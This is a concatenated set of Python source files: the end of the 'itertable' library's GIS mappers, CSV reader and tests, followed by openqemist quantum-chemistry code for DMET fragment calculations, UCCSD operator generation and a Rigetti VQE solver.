key: value for key, value in feat.items()
if key not in ('geometry', 'id',)
}
}
def dump(self):
# Dump and save the dataset at the same time via Fiona
pass
def save(self):
with fiona.open(self.filename, 'w', **self.meta) as f:
for i, feat in enumerate(self.data):
f.write(self.dump_feature(feat, i))
class GisMapper(TupleMapper):
"""
GIS-aware tuple mapper
"""
def as_dataframe(self):
# Mimic BaseIter.as_dataframe() but with GeoDataFrame
# (also, key_field is always set)
from geopandas import GeoDataFrame
key = self.get_key_field()
data = [self.item_dict(row) for row in self.values()]
df = GeoDataFrame(data)
df.set_index(key, inplace=True)
return df
def item_dict(self, uitem):
# Turn usable item into GeoDataFrame-friendly dict
data = uitem._asdict()
data['geometry'] = geometry.shape(data['geometry'])
return data
class ShapeMapper(GisMapper):
"""
Map Fiona's GeoJSON-style geometries to and from Shapely shapes
"""
def map_value(self, field, value):
value = super(ShapeMapper, self).map_value(field, value)
if field == 'geometry':
value = geometry.shape(value)
return value
def unmap_value(self, field, value):
if field == 'geometry':
value = geometry.mapping(value)
return super(ShapeMapper, self).unmap_value(field, value)
def item_dict(self, uitem):
return uitem._asdict()
class WktMapper(ShapeMapper):
"""
Map geometries to and from WKT (good for Django integration)
"""
def map_value(self, field, value):
value = super(WktMapper, self).map_value(field, value)
if field == 'geometry':
value = wkt.dumps(value)
return value
def unmap_value(self, field, value):
if field == 'geometry':
value = wkt.loads(value)
return super(WktMapper, self).unmap_value(field, value)
def item_dict(self, uitem):
data = uitem._asdict()
data['geometry'] = wkt.loads(data['geometry'])
return data
def guess_driver(filename):
if filename.endswith(".shp"):
return "ESRI Shapefile"
else:
return "GeoJSON"
```
#### File: itertable/parsers/readers.py
```python
try:
import unicodecsv as csv
UNICODE_CSV = True
except ImportError:
import csv
UNICODE_CSV = False
if issubclass(csv.DictReader, object):
# Python 3
DictReader = csv.DictReader
else:
# Python 2
class DictReader(object, csv.DictReader):
pass
class SkipPreludeReader(DictReader):
"""
A specialized version of DictReader that attempts to find where the "real"
CSV data is in a file that may contain a prelude of non-CSV text.
"""
max_header_row = 20
def __init__(self, f, fieldnames=None, restkey=None, restval=None,
dialect="excel", *args, **kwds):
# Preserve file since we're going to start reading it
self._file = f
# Preserve reader options since we'll need to make another one
readeropts = [f, dialect]
readeropts.extend(args)
self._readeropts = (readeropts, kwds)
csv.DictReader.__init__(self, f, fieldnames, restkey, restval,
dialect, *args, **kwds)
@property
def fieldnames(self):
if self._fieldnames is not None:
return self._fieldnames
# Create a new reader just to figure out which row is the header
args, kwds = self._readeropts
data = csv.reader(*args, **kwds)
rows = []
for i in range(self.max_header_row):
try:
rows.append(next(data))
except StopIteration:
pass
header_row, field_names = self.choose_header(rows)
# Reset file and advance reader so it starts in the right spot
self._file.seek(0)
for i in range(header_row + 1):
try:
next(self.reader)
except StopIteration:
pass
self._fieldnames = field_names
self._header_row = header_row
return field_names
@property
def header_row(self):
self.fieldnames # used for side effect
return self._header_row
def choose_header(self, rows):
"""
Determine which row contains column headers from the provided set.
Default is to assume that the first longest row is the header.
"""
header_row = 0
field_names = []
# Select header from available rows
for i, row in enumerate(rows):
if len(row) > len(field_names):
header_row = i
field_names = row
return header_row, field_names
```
#### File: itertable/tests/base.py
```python
from os.path import join, dirname
from os import unlink
import unittest
class IoTestCase(unittest.TestCase):
data = [{
'one': 1,
'two': 2,
'three': 3,
}, {
'one': 4,
'two': 5,
'three': 6,
}]
def get_filename(self, filename, ext, remove_existing=False):
filename = join(dirname(__file__), "files", "%s.%s" % (filename, ext))
if remove_existing:
try:
unlink(filename)
except OSError:
pass
return filename
def check_instance(self, instance):
self.assertEqual(len(instance), len(self.data))
for row, data in zip(instance, self.data):
for key in data:
val = getattr(row, key)
try:
val = int(float(val))
except ValueError:
pass
self.assertEqual(val, data[key])
```
#### File: itertable/tests/test_custom.py
```python
from itertable import JsonFileIter, XmlFileIter
from itertable.exceptions import MappingFailed
from .base import IoTestCase
class CustomJsonFileIter(JsonFileIter):
namespace = "data.items"
class ExtraJsonFileIter(CustomJsonFileIter):
scan_fields = True
class CustomXmlFileIter(XmlFileIter):
root_tag = "items"
item_tag = "item"
class CustomTestCase(IoTestCase):
def test_custom_json(self):
filename = self.get_filename("custom", "json")
instance = CustomJsonFileIter(filename=filename)
self.check_instance(instance)
def test_scan_fields(self):
filename = self.get_filename("custom2", "json")
instance = ExtraJsonFileIter(filename=filename)
self.check_instance(instance)
self.assertIn("four", instance.get_field_names())
self.assertIsNone(instance[0].four)
self.assertEqual(instance[1].four, "extra")
def test_unexpected_field(self):
filename = self.get_filename("custom2", "json")
instance = CustomJsonFileIter(filename=filename)
# Extra field in non-first row breaks namedtuple
with self.assertRaises(MappingFailed) as e:
instance[1]
self.assertIn("unexpected field", str(e.exception))
def test_custom_xml(self):
filename = self.get_filename("custom", "xml")
instance = CustomXmlFileIter(filename=filename)
self.check_instance(instance)
```
#### File: itertable/tests/test_gis_dataframe.py
```python
from itertable.gis import GisIter, WktIter, ShapeIter
from .base import IoTestCase
class GisDataFrameTestCase(IoTestCase):
def test_gisio_dataframe(self):
self.dataframe_test(GisIter)
def test_wktio_dataframe(self):
self.dataframe_test(WktIter)
def test_shapeio_dataframe(self):
self.dataframe_test(ShapeIter)
def dataframe_test(self, cls):
instance = cls(filename="tests/files/test.shp")
df = instance.as_dataframe()
self.assertEqual(len(df), 2)
self.assertGreater(df.geometry.area.sum(), 0)
``` |
{
"source": "1QB-Information-Technologies/openqemist",
"score": 2
} |
#### File: dmet/_helpers/dmet_bath.py
```python
import numpy as np
def dmet_fragment_bath(mol, t_list, temp_list, onerdm_low):
""" Construct the bath orbitals for DMET fragment calculation.
Args:
mol (pyscf.gto.Mole): The molecule to simulate (The full molecular system).
t_list (list): Number of [0] fragment & [1] bath orbitals (int).
temp_list (list): [0] Minimum and [1] maximum number for the active orbitals (int).
onerdm_low (numpy.array): One-particle RDM from the low-level calculation (float64).
Returns:
bath_orb (numpy.array): The bath orbitals (float64).
e_core (numpy.array): Orbital energies (float64).
"""
# Extract the one-particle RDM for the active space
onerdm_embedded = dmet_onerdm_embed(mol, temp_list, onerdm_low)
# Diagonalize it
e, c = np.linalg.eigh(onerdm_embedded)
# Sort the eigenvectors with the eigenvalues
e_sorted, c_sorted = dmet_bath_orb_sort(t_list, e, c)
# Add the core contribution
bath_orb, e_core = dmet_add_to_bath_orb(mol, t_list, temp_list, e_sorted, c_sorted)
return bath_orb, e_core
def dmet_onerdm_embed(mol, temp_list, onerdm_before):
""" Extract the one particle RDM of the active space.
Args:
mol (pyscf.gto.Mole): The molecule to simulate (The full molecular system).
temp_list (list): [0] Minimum and [1] maximum number for the active orbitals (int).
onerdm_before (numpy.array): One-particle RDM from the low-level calculation (float64).
Returns:
onerdm_temp3 (numpy.array): Extracted one-particle RDM (float64).
"""
# Get the number of orbitals
norbital_total = mol.nao_nr()
# Reshape the RDM
onerdm_matrix = np.reshape(onerdm_before, (norbital_total, norbital_total))
if temp_list[0] == 0:
# If it is the first fragment, just determine the maximum for extraction
onerdm_temp = onerdm_matrix[ : , temp_list[1]: ]
onerdm_temp3 = onerdm_temp[temp_list[1]: , : ]
else:
# Determine the minimum and maximum orbitals for extraction
onerdm_temp = onerdm_matrix[ : , : temp_list[0]]
onerdm_temp2 = onerdm_matrix[ : , temp_list[1]: ]
onerdm_temp3 = np.hstack((onerdm_temp, onerdm_temp2))
onerdm_temp = onerdm_temp3[ : temp_list[0], : ]
onerdm_temp2 = onerdm_temp3[temp_list[1]: , : ]
onerdm_temp3 = np.vstack((onerdm_temp, onerdm_temp2))
return onerdm_temp3
def dmet_bath_orb_sort(t_list, e_before, c_before):
""" Sort the bath orbitals with the eigenvalues (orbital energies).
Args:
t_list (list): Number of [0] fragment & [1] bath orbitals (int).
e_before (numpy.array): Orbitals energies before sorting (float64).
c_before (numpy.array): Coefficients of the orbitals before sorting (float64).
Returns:
e_new (numpy.array): Sorted orbital energies (float64).
c_new (numpy.array): Coefficients of the sorted orbitals (float64).
"""
# Sort the orbital energies (Occupation of 1.0 should come first...)
new_index = np.maximum(-e_before, e_before - 2.0).argsort()
# Throw away some orbitals above threshold
thresh_orb = np.sum(-np.maximum(-e_before, e_before - 2.0)[new_index] > 1e-13)
# Determine the number of bath orbitals
norb = min(np.sum(thresh_orb), t_list[0])
t_list.append(norb)
# Sort the bath orbitals with its energies
e_new = e_before[new_index]
c_new = c_before[ : , new_index]
return e_new, c_new
def dmet_add_to_bath_orb( mol, t_list, temp_list, e_before, c_before ):
""" Add the frozen core part to the bath orbitals.
Args:
mol (pyscf.gto.Mole): The molecule to simulate (The full molecular system).
t_list (list): Number of [0] fragment & [1] bath orbitals (int).
temp_list (list): [0] Minimum and [1] maximum number for the active orbitals (int).
e_before (numpy.array): Orbital energy before addition of frozen core (float64).
c_before (numpy.array): Coefficients of the orbitals before addition of frozen core (float64).
Returns:
c_before (numpy.array): Constructed bath orbitals (float64).
e_occupied_core_orbitals (numpy.array): Orbital energies (float64).
"""
# Copy the bath orbitals and energies be fore adding the core
add_e = - e_before[t_list[1]: ]
add_c = c_before[ : , t_list[1]: ]
new_index = add_e.argsort()
# Sort the orbitals based on its energies
c_before[ : , t_list[1]: ] = add_c[ : , new_index]
add_e = - add_e[new_index]
# The orbital energies with core part
norbital_total = mol.nao_nr()
e_occupied_core_orbitals = np.hstack((np.zeros([t_list[0] + t_list[1]]), add_e))
# Add the core part in the orbitals
for orb in range(0, t_list[0]):
c_before = np.insert(c_before, orb, 0.0, axis=1)
i_temp = 0
for orb_total in range( 0, norbital_total ):
if ((orb_total >= temp_list[0]) and (orb_total < temp_list[1])):
c_before = np.insert(c_before, orb_total, 0.0, axis=0)
c_before[orb_total, i_temp] = 1.0
i_temp += 1
return c_before, e_occupied_core_orbitals
```
#### File: dmet/_helpers/dmet_oneshot_loop.py
```python
import numpy as np
import scipy
from dmet_bath import dmet_fragment_bath
from dmet_onerdm import dmet_low_rdm, dmet_fragment_rdm
from dmet_scf_guess import dmet_fragment_guess
from dmet_scf import dmet_fragment_scf
from dmet_cc_classical import dmet_fragment_cc_classical
from dmet_cc_quantum import dmet_fragment_cc_quantum
def dmet_oneshot_exe(input_dmet, dmet_orbs, orb_list, orb_list2):
"""
This is the code for one-shot DMET calculation
:param input_dmet: The dmet input object (dmet_input class)
:param dmet_orbs: The dmet orbs object (from dmet_orbitals)
:param orb_list: The number of orbitals for each DMET calculation
:param orb_list2: Lists of the minimum and maximum of the IAO label for each DMET calculation
:return: DMET energy and chemical potential
"""
# Initialize chemical potential
chemical_potential=0.0
# Optimize the DMET energy and chemical potential
dmet_energy, chemical_potential = dmet_chemical_potential(input_dmet, dmet_orbs, orb_list, orb_list2, chemical_potential)
print(' \t*** DMET Cycle Done *** ')
print(' \tDMET Energy ( a.u. ) = '+'{:17.10f}'.format(dmet_energy))
print(' \tChemical Potential = '+'{:17.10f}'.format(chemical_potential))
print(' ')
return dmet_energy, chemical_potential
def dmet_chemical_potential(input_dmet, dmet_orbs, orb_list, orb_list2, chemical_potential):
"""
Initialize the SCF loop for the chemical potential
In one-shot DMET calculations, the iteration continues until chemical potential is connverged to 0
:param input_dmet: The dmet input object (dmet_input class)
:param dmet_orbs: The dmet orbs object (from dmet_orbitals)
:param orb_list: The number of orbitals for each DMET calculation
:param orb_list2: Lists of the minimum and maximum of the IAO label for each DMET calculation
:param chemical_potential: the chemical potential to be optimized =0 (for consistency over the entire system)
:return: DMET energy and chemical potential
"""
# Initialize the energy list and SCF procedure employing newton-raphson algorithm
energy = []
chemical_potential = scipy.optimize.newton(dmet_num_electron, chemical_potential, args = (input_dmet, dmet_orbs, orb_list, orb_list2, energy))
# Get the final energy value
niter = len(energy)
dmet_energy = energy[niter-1]
return dmet_energy, chemical_potential
def dmet_num_electron(chemical_potential, input_dmet, dmet_orbs, orb_list, orb_list2, energy_list):
"""
Obtain the difference of the number of electrons of the DMET calculation by summing up the trace of RDM for each calculation
:param input_dmet: The dmet input object (dmet_input class)
:param chemical_potential: The chemical potential in the previous iteration
:param dmet_orbs: The dmet orbs object (from dmet_orbitals)
:param orb_list: The number of orbitals for each DMET calculation
:param orb_list2: Lists of the minimum and maximum of the IAO label for each DMET calculation
:param energy_list: List of the DMET energies (For each iteration)
:return: The difference of the number of electrons
"""
# Print the iteration number
niter = len(energy_list)+1
print(" \tIteration = ", niter)
print(' \t----------------')
print(' ')
# Obtain the number of electrons from DMET calculations
num_electron_temp = dmet_frag_loop(input_dmet, dmet_orbs, orb_list, orb_list2, energy_list, chemical_potential)
print(" \tNumber of Active Electrons = ", dmet_orbs.number_active_electrons)
print(" \tNumber of the Sum of Electrons = "+'{:12.8f}'.format(num_electron_temp))
# Obtain the difference of the number of electrons
number_of_electron_difference = num_electron_temp - dmet_orbs.number_active_electrons
print(" \tElectron Number Difference = "+'{:12.8f}'.format(number_of_electron_difference))
print(' ')
return number_of_electron_difference
def dmet_frag_loop(input_dmet, dmet_orbs, orb_list, orb_list2, energy_list, chemical_potential):
"""
The main loop of the one-shot DMET calculation
:param input_dmet: The dmet input object (dmet_input class)
:param dmet_orbs: The dmet orbs object (from dmet_orbitals)
:param orb_list: The number of orbitals for each DMET calculation
:param orb_list2: Lists of the minimum and maximum of the IAO label for each DMET calculation
:param energy_list: List of the DMET energies (For each iteration)
:param chemical_potential: The chemical potential in the previous iteration
:return: Number of electrons (sum of trace of the RDMs over each fragment)
"""
# Obtain the one particle RDM from low-level calculation of the entire system
onerdm_low = dmet_low_rdm(dmet_orbs.active_fock, dmet_orbs.number_active_electrons)
# Initialize some parameters
energy_temp = 0.0
number_of_electron = 0.0
# Loop over each fragment
for i, norb in enumerate(orb_list):
print("\t\tFragment Number : # ", i+1)
print('\t\t------------------------')
t_list=[]
t_list.append(norb)
temp_list = orb_list2[i]
# Construct bath orbitals
bath_orb, e_occupied = dmet_fragment_bath(dmet_orbs.mol_full, t_list, temp_list, onerdm_low)
# Obtain one particle rdm for a fragment
norb_high, nelec_high, onerdm_high = dmet_fragment_rdm(t_list, bath_orb, e_occupied, dmet_orbs.number_active_electrons)
# Calculate matrices for the Hamiltonian of a fragment
one_ele, fock, two_ele = dmet_orbs.dmet_fragment_hamiltonian(bath_orb, norb_high, onerdm_high)
# Construct guess orbitals for fragment SCF calculations
print("\t\tNumber of Orbitals ",norb_high)
print("\t\tNumber of Electrons ",nelec_high)
guess_orbitals = dmet_fragment_guess(t_list, bath_orb, chemical_potential, norb_high, nelec_high, dmet_orbs.active_fock)
# Carry out SCF calculation for a fragment
mf_fragments, fock_frag_copy, mol_frag = dmet_fragment_scf(t_list, two_ele, fock, nelec_high, \
norb_high, guess_orbitals, chemical_potential)
if mf_fragments.converged:
print("\t\tSCF Converged ")
else:
print("\t\tSCF NOT CONVERGED !!!")
exit()
print("\t\tSCF Energy = "+'{:17.10f}'.format(mf_fragments.e_tot))
# Perform high-level CC calculation for a fragment and calculate energy for a fragment
# Perform quantum simulation
if(input_dmet.quantum == 1):
print("norb_high = ",norb_high)
print("nelec_high = ",nelec_high)
fragment_energy, onerdm_frag, total_energy, total_energy_rdm = dmet_fragment_cc_quantum(input_dmet, mf_fragments, fock_frag_copy, t_list, one_ele, two_ele, fock, norb_high, nelec_high, mol_frag)
# Perform classical simulation
else:
fragment_energy, onerdm_frag, total_energy, total_energy_rdm = dmet_fragment_cc_classical(mf_fragments, fock_frag_copy, t_list, one_ele, two_ele, fock)
print("\t\tECCSD ( Conventional ) = "+'{:17.10f}'.format(total_energy))
print("\t\tECCSD ( RDM ) = "+'{:17.10f}'.format(total_energy_rdm))
# Sum up the energy
energy_temp += fragment_energy
# Sum up the number of electrons
number_of_electron += np.trace(onerdm_frag[ : t_list[0], : t_list[0]])
# Print the results
print("\t\tFragment Energy = "+'{:17.10f}'.format(fragment_energy))
print("\t\tNumber of Electrons in Fragment = "+'{:17.10f}'.format(np.trace(onerdm_frag)))
print('')
# add core constant terms to the energy
energy_temp += dmet_orbs.core_constant_energy
energy_list.append(energy_temp)
return number_of_electron
```
#### File: quantum_solvers/microsoft_qsharp/generate_uccsd_operators.py
```python
import itertools
def complex_as_dict(re, im):
import cmath
x = complex(re, im)
return {'Real': re, 'Imaginary': im, 'Magnitude': abs(x), 'Phase': cmath.phase(x)}
def alpha_spinorbital(MO):
''' Return the corresponding alpha spinorbital index given a molecular orbital (MO) index
Args:
MO(int): molecular orbital index
Returns:
(2*MO)(int): alpha spin-orbital index
'''
return 2*MO
def beta_spinorbital(MO):
''' Return the corresponding beta spinorbital index given a molecular orbital (MO) index
Args:
MO(int): molecular orbital index
Returns:
(2*MO + 1)(int): beta spin-orbital index
'''
return 2 * MO + 1
def count_amplitudes(n_spinorbitals,n_electrons):
"""Count the number of singles and doubles amplitudes for a given UCCSD-VQE run
Args:
n_spinorbitals(int): integer representing the number of spinorbitals (qubits) for
a given molecule and basis set
n_electrons(int): integer representing the number of electrons for a given molecule
Returns:
n_amplitudes(int): integer representing the total number of amplitudes (MO basis)
"""
# Compute the number of MOs and the number of occupied and virtual MOs
n_MO = n_spinorbitals // 2
n_occ = n_electrons // 2
n_virt = n_MO - n_occ
# Compute the number of singles and doubles amplitudes
n_singles = n_occ*n_virt
n_doubles = n_singles*(n_singles + 1) // 2
return n_singles + n_doubles
def compute_cluster_operator(n_spinorbitals, n_electrons, amplitudes, multiply=False, operator = []):
"""Compute or update the cluster operator for a given UCCSD-VQE run
n_spinorbitals(int): integer representing the number of spinorbitals (qubits) for
a given molecule and basis set
n_electrons(int): integer representing the number of electrons for a given molecule
amplitudes(list): list of the amplitudes, with the singles appearing first, followed
by the diagonal (i,i,a,a) doubles and then the off-diagonal (i,j,a,b)
doubles
multiply(bool): optional boolean to indicate whether we are performing an amplitude
update (i.e. multiplying a new set of amplitudes by the corresponding
operators) or not
operator(list): optional list of the contributions to the cluster operator
Returns:
ref(tuple): tuple of tuples representing the reference configuration
t(list): list of tuples representing the cluster operator
"""
# Compute the number of MOs and the number of occupied and virtual MOs
n_MO = n_spinorbitals // 2
n_occ = n_electrons // 2
n_virt = n_MO - n_occ
# Extract the singles amplitudes and diagonal doubles amplitudes
singles = amplitudes[:(n_occ*n_virt)]
doubles_diag = amplitudes[(n_occ*n_virt):(2*n_occ*n_virt)]
doubles_offdiag = amplitudes[(2*n_occ*n_virt):]
# Spin indexing
spin_index = [alpha_spinorbital, beta_spinorbital]
# -------------------------------------------------------
# Reference configuration
# -------------------------------------------------------
#Loop over occupied orbitals
li = []
j = 0
for i in range(n_occ):
# Define alpha and beta spinorbitals
i_a = alpha_spinorbital(i)
i_b = beta_spinorbital(i)
if(multiply):
li += [i_a,i_b]
else:
li += [('u',i_a), ('u', i_b)]
# Define the reference state
if(multiply):
ref = ((1.0,0.0),li)
#ref = (li,1)
else:
#ref = ((1.0, 0.0),(li,1))
ref = (li,1)
t = []
# -------------------------------------------------------
# Single excitations and diagonal double excitations
# -------------------------------------------------------
# Loop over occupied and virtual orbitals
for i, (m,n) in enumerate(itertools.product(range(n_virt),range(n_occ))):
# n labels virtual orbitals (offset of n_occ)
m += n_occ
# Loop over spin
for spin in range(2):
# Mapping of spatial orbitals to spin-orbitals
ind_1 = spin_index[spin]
ind_2 = spin_index[1-spin]
# Define spin-orbital labels
m_1 = ind_1(n)
m_2 = ind_2(n)
n_1 = ind_1(m)
n_2 = ind_2(m)
if(multiply):
# Multiply the singles operators by the correct amplitudes
t += [((singles[i], 0.0), operator[j][1])]
#t += [(operator[j][1], complex_as_dict(singles[i],0.0))]
j += 1
# Multiply the diagonal doubles operators by the correct amplitudes
if(m_1 != m_2 and n_1 != n_2):
t += [((doubles_diag[i], 0.0), operator[j][1])]
j += 1
else:
# Generate the singles excitations in the proper format
t += [(([('u',n_1),('d',m_1)],1), complex_as_dict(singles[i],0.0))]
# Generate the diagonal doubles excitations in the proper format
if(m_1 != m_2 and n_1 != n_2):
t += [(([('u',n_1),('u',n_2),('d',m_1),('d',m_2)],1), complex_as_dict(doubles_diag[i],0.0))]
# Loop over unique off-diagonal doubles
for i, ((m,u),(n,v)) in enumerate(itertools.combinations(
itertools.product(range(n_virt),range(n_occ)),2)
):
# m and n label virtual orbitals (offset of n_occ)
m += n_occ
n += n_occ
# Loop over spin
for (spin_1, spin_2) in itertools.product(range(2), repeat=2):
# Mapping of spatial orbitals to spin-orbitals
ind_1 = spin_index[spin_1]
ind_2 = spin_index[spin_2]
# Define spin-orbital labels
m_1 = ind_1(u)
m_2 = ind_2(v)
n_1 = ind_1(m)
n_2 = ind_2(n)
if(multiply):
# Multiply the off-diagonal doubles excitation operators by the correct amplitudes
if(m_1 != m_2 and n_1 != n_2):
t += [((1.0*doubles_offdiag[i],0.0), operator[j][1])]
j += 1
else:
# Generate the off-diagonal doubles excitations in the proper format
if(m_1 != m_2 and n_1 != n_2):
t += [(([('u',n_1),('u',n_2),('d',m_1),('d',m_2)],1), complex_as_dict(doubles_offdiag[i],0.0))]
# If multiply is true, then append the reference configuration to t
if (multiply): t += [ref]
return ref, t
```
#### File: quantum_solvers/rigetti/rigetti_parametric_solver.py
```python
from enum import Enum
import numpy as np
from pyscf import ao2mo, mp, scf
from openfermion.transforms import jordan_wigner
from openfermion.hamiltonians import MolecularData
from openfermionprojectq import uccsd_trotter_engine, uccsd_singlet_evolution
from openfermion.utils import uccsd_singlet_paramsize, uccsd_singlet_generator
from pyquil.quil import Program, Pragma
from pyquil.paulis import exponentiate, commuting_sets, sX, sY, sZ, sI
from pyquil.gates import *
from pyquil.api import WavefunctionSimulator, get_qc
from pyquil.experiment import ExperimentSetting, TomographyExperiment, TensorProductState
from forestopenfermion import qubitop_to_pyquilpauli
from ..parametric_quantum_solver import ParametricQuantumSolver
class RigettiParametricSolver(ParametricQuantumSolver):
"""Performs an energy estimation for a molecule with a parametric circuit.
Performs energy estimations for a given molecule and a choice of ansatz
circuit that is supported.
Uses the CCSD method to solve the electronic structure problem.
PySCF program will be utilized.
Users can also provide a function that takes a `pyscf.gto.Mole`
as its first argument and `pyscf.scf.RHF` as its second.
Attributes:
optimized_amplitudes (list): The optimized UCCSD amplitudes.
of_mole (openfermion.hamiltonian.MolecularData): Molecular Data in Openfermion.
f_hamiltonian (openfermion.ops.InteractionOperator): Fermionic Hamiltonian.
qubit_hamiltonian (openfermion.transforms.jordan_wigner): Qubit Hamiltonian.
n_qubits (int): Number of qubits.
"""
class Ansatze(Enum):
""" Enumeration of the ansatz circuits that are supported."""
UCCSD = 0
def __init__(self, ansatz, molecule, mean_field = None,
backend_options = {"backend":"wavefunction_simulator"}):
"""Initialize the settings for simulation.
If the mean field is not provided it is automatically calculated.
Args:
ansatz (OpenFermionParametricSolver.Ansatze): Ansatz for the quantum solver.
molecule (pyscf.gto.Mole): The molecule to simulate.
mean_field (pyscf.scf.RHF): The mean field of the molecule.
"""
# Check the ansatz
assert(isinstance(ansatz, RigettiParametricSolver.Ansatze))
self.ansatz = ansatz
# Calculate the mean field if the user has not already done it.
if not mean_field:
mean_field = scf.RHF(molecule)
mean_field.verbose = 0
mean_field.scf()
if not mean_field.converged:
orb_temp = mean_field.mo_coeff
occ_temp = mean_field.mo_occ
nr = scf.newton(mean_field)
energy = nr.kernel(orb_temp, occ_temp)
mean_field = nr
# Check the convergence of the mean field
if not mean_field.converged:
warnings.warn("RigettiParametricSolver simulating with mean field not converged.",
RuntimeWarning)
self.molecule = molecule
self.mean_field = mean_field
# Initialize the amplitudes (parameters to be optimized)
self.optimized_amplitudes = []
# Set the parameters for Openfermion
self.of_mole = self._build_of_molecule(molecule, mean_field)
# Set the fermionic Hamiltonian
self.f_hamiltonian = self.of_mole.get_molecular_hamiltonian()
# Transform the fermionic Hamiltonian into qubit Hamiltonian
self.qubit_hamiltonian = jordan_wigner(self.f_hamiltonian)
self.qubit_hamiltonian.compress()
# Also stores the Rigetti/Forest qubit Hamiltonian
self.forest_qubit_hamiltonian = qubitop_to_pyquilpauli(self.qubit_hamiltonian)
# Set the dimension of the amplitudes
if ansatz == RigettiParametricSolver.Ansatze.UCCSD:
no_occupied = int(np.ceil(molecule.nelectron / 2))
no_virtual = len(mean_field.mo_energy) - no_occupied
no_t1 = no_occupied * no_virtual
no_t2 = no_t1 * (no_t1 + 1) / 2
self.amplitude_dimension = int(no_t1 + no_t2)
# Set the number of qubits
self.n_qubits = self.of_mole.n_qubits
# Instantiate backend for computation
self.backend_options = dict()
if ("backend" in backend_options) and (backend_options["backend"] != "wavefunction_simulator"):
self.backend_options["backend"] = get_qc(backend_options["backend"])
else:
self.backend_options["backend"] = WavefunctionSimulator()
self.backend_options["n_shots"] = backend_options["n_shots"] if ("n_shots" in backend_options) else 1000
def simulate(self, amplitudes):
"""Perform the simulation for the molecule.
Args:
amplitudes (list): The initial amplitudes (float64).
Returns:
float64: The total energy (energy).
Raise:
ValueError: If the dimension of the amplitude list is incorrect.
"""
if len(amplitudes) != self.amplitude_dimension:
raise ValueError("Incorrect dimension for amplitude list.")
#Anti-hermitian operator and its qubit form
generator = uccsd_singlet_generator(amplitudes, self.of_mole.n_qubits, self.of_mole.n_electrons)
jw_generator = jordan_wigner(generator)
pyquil_generator = qubitop_to_pyquilpauli(jw_generator)
p = Program(Pragma('INITIAL_REWIRING', ['"GREEDY"']))
# Set initial wavefunction (Hartree-Fock)
for i in range(self.of_mole.n_electrons):
p.inst(X(i))
# Trotterization (unitary for UCCSD state preparation)
for term in pyquil_generator.terms :
term.coefficient = np.imag(term.coefficient)
p += exponentiate(term)
p.wrap_in_numshots_loop(self.backend_options["n_shots"])
# Do not simulate if no operator was passed
if len(self.qubit_hamiltonian.terms) == 0:
return 0.
else:
# Run computation using the right backend
if isinstance(self.backend_options["backend"], WavefunctionSimulator):
energy = self.backend_options["backend"].expectation(prep_prog=p, pauli_terms=self.forest_qubit_hamiltonian)
else:
# Set up experiment, each setting corresponds to a particular measurement basis
settings = [ExperimentSetting(in_state=TensorProductState(), out_operator=forest_term) for forest_term in self.forest_qubit_hamiltonian.terms]
experiment = TomographyExperiment(settings=settings, program=p)
print(experiment, "\n")
results = self.backend_options["backend"].experiment(experiment)
energy = 0.
coefficients = [forest_term.coefficient for forest_term in self.forest_qubit_hamiltonian.terms]
for i in range(len(results)):
energy += results[i].expectation * coefficients[i]
energy = np.real(energy)
# Save the amplitudes so we have the optimal ones for RDM calculation
self.optimized_amplitudes = amplitudes
return energy
def get_rdm(self):
"""Obtain the RDMs from the optimized amplitudes.
Obtain the RDMs from the optimized amplitudes by using the
same function for energy evaluation.
The RDMs are computed by using each fermionic Hamiltonian term,
transforming them and computing the elements one-by-one.
Note that the Hamiltonian coefficients will not be multiplied
as in the energy evaluation.
The first element of the Hamiltonian is the nuclear repulsion
energy term, not the Hamiltonian term.
Returns:
(numpy.array, numpy.array): One & two-particle RDMs (rdm1_np & rdm2_np, float64).
Raises:
RuntimeError: If no simulation has been run.
"""
if len(self.optimized_amplitudes) == 0:
raise RuntimeError("Cannot retrieve RDM because no simulation has been run.")
# Save our accurate hamiltonian
tmp_hamiltonian = self.qubit_hamiltonian
# Initialize the RDM arrays
rdm1_np=np.zeros((self.of_mole.n_orbitals,)*2)
rdm2_np=np.zeros((self.of_mole.n_orbitals,)*4)
# Loop over each element of Hamiltonian (non-zero value)
for ikey,key in enumerate(self.f_hamiltonian):
length=len(key)
# Treat one-body and two-body term accordingly
if(length==2):
pele, qele = int(key[0][0]), int(key[1][0])
iele, jele = pele//2, qele//2
if(length==4):
pele, qele, rele, sele = int(key[0][0]), int(key[1][0]), int(key[2][0]), int(key[3][0])
iele, jele, kele, lele = pele//2, qele//2, rele//2, sele//2
# Select the Hamiltonian element (Set coefficient to one)
hamiltonian_temp = self.of_mole.get_molecular_hamiltonian()
for jkey,key2 in enumerate(hamiltonian_temp):
hamiltonian_temp[key2] = 1. if (key == key2 and ikey !=0) else 0.
# Qubitize the element
qubit_hamiltonian2 = jordan_wigner(hamiltonian_temp)
qubit_hamiltonian2.compress()
# Overwrite with the temp hamiltonian
self.qubit_hamiltonian = qubit_hamiltonian2
self.forest_qubit_hamiltonian = qubitop_to_pyquilpauli(self.qubit_hamiltonian)
# Calculate the energy with the temp hamiltonian
opt_energy2 = self.simulate(self.optimized_amplitudes)
# Put the values in np arrays (differentiate 1- and 2-RDM)
if(length==2):
rdm1_np[iele,jele] = rdm1_np[iele,jele] + opt_energy2
elif(length==4):
if((iele!=lele) or (jele!=kele)):
rdm2_np[lele,iele,kele,jele] = rdm2_np[lele,iele,kele,jele] + 0.5 * opt_energy2
rdm2_np[iele,lele,jele,kele] = rdm2_np[iele,lele,jele,kele] + 0.5 * opt_energy2
else:
rdm2_np[iele,lele,jele,kele] = rdm2_np[iele,lele,jele,kele] + opt_energy2
# Restore the accurate hamiltonian
self.qubit_hamiltonian = tmp_hamiltonian
return rdm1_np, rdm2_np
def default_initial_var_parameters(self):
""" Returns initial variational parameters for a VQE simulation.
Returns initial variational parameters for the circuit that is generated
for a given ansatz.
Returns:
list: Initial parameters.
"""
if self.ansatz == self.__class__.Ansatze.UCCSD:
from .._variational_parameters import mp2_variational_parameters
return mp2_variational_parameters(self.molecule, self.mean_field)
else:
raise RuntimeError("Unsupported ansatz for automatic parameter generation")
def _build_of_molecule(self, molecule, mean_field):
"""Initialize the instance of Openfermion MolecularData class.
Interface the pyscf and Openfermion data.
`pyscf.ao2mo` is used to transform the AO integrals into
the MO integrals.
Args:
molecule (pyscf.gto.Mole): The molecule to simulate.
mean_field (pyscf.scf.RHF): The mean field of the molecule.
Returns:
openfermion.hamiltonian.MolecularData: Molecular Data in Openfermion (of_mole).
"""
of_mole = MolecularData(geometry=molecule.atom, basis=molecule.basis,
multiplicity=molecule.spin + 1)
of_mole.mf = mean_field
of_mole.mol = molecule
